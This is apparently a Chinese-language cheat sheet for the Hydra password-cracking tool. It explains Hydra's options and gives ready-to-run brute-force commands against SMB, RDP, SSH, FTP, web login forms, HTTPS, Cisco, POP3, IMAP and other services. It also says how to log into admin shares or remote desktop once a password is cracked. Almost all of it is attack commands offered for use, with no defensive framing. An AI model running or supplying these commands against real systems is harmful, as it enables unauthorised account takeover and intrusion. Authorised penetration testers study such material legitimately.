# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
参数详解:
hydra 爆破smb 445
hydra -l administrator -P passwd.txt smb://192.168.132.1 -v
爆破成功后 在 文件夹路径的地方输入 \\192.168.132.1\admin$ 然后登录
hydra 爆破3389
hydra ip rdp -l administrator -P pass.txt -V
在linux里面登录 rdesktop 192.168.1.1 直接登录
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)-M <FILE>指定目标列表文件一行一条-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o <FILE>输出文件
-t 指定多线程数量,默认为16个线程-w TIME 设置最大超时的时间,单位秒,默认是30s
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)
爆破 ssh:22 端口命令:
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh
爆破 Ftp:21 端口命令(指定用户名为root):
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp
get方式提交,破解web登录(指定用户名为admin):
hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录:
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。
破解https:
hydra -m /index.php -l admin -P password.txt 192.168.0.132 https
破解teamspeak:
hydra -l admin -P passworrd.txt -s 端口号 -vV 192.168.0.132 teamspeak
破解cisco:
hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable
破解smb:
hydra -l administrator -P password.txt 192.168.0.132 smb
破解pop3:
hydra -l root -P password.txt my.pop3.mail pop3
破解rdp(3389端口):
hydra -l administrator -P password.txt -V 192.168.0.132 rdp
破解http-proxy:
hydra -l admin -P passwprd.txt http-proxy://192.168.0.132
破解imap:
hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN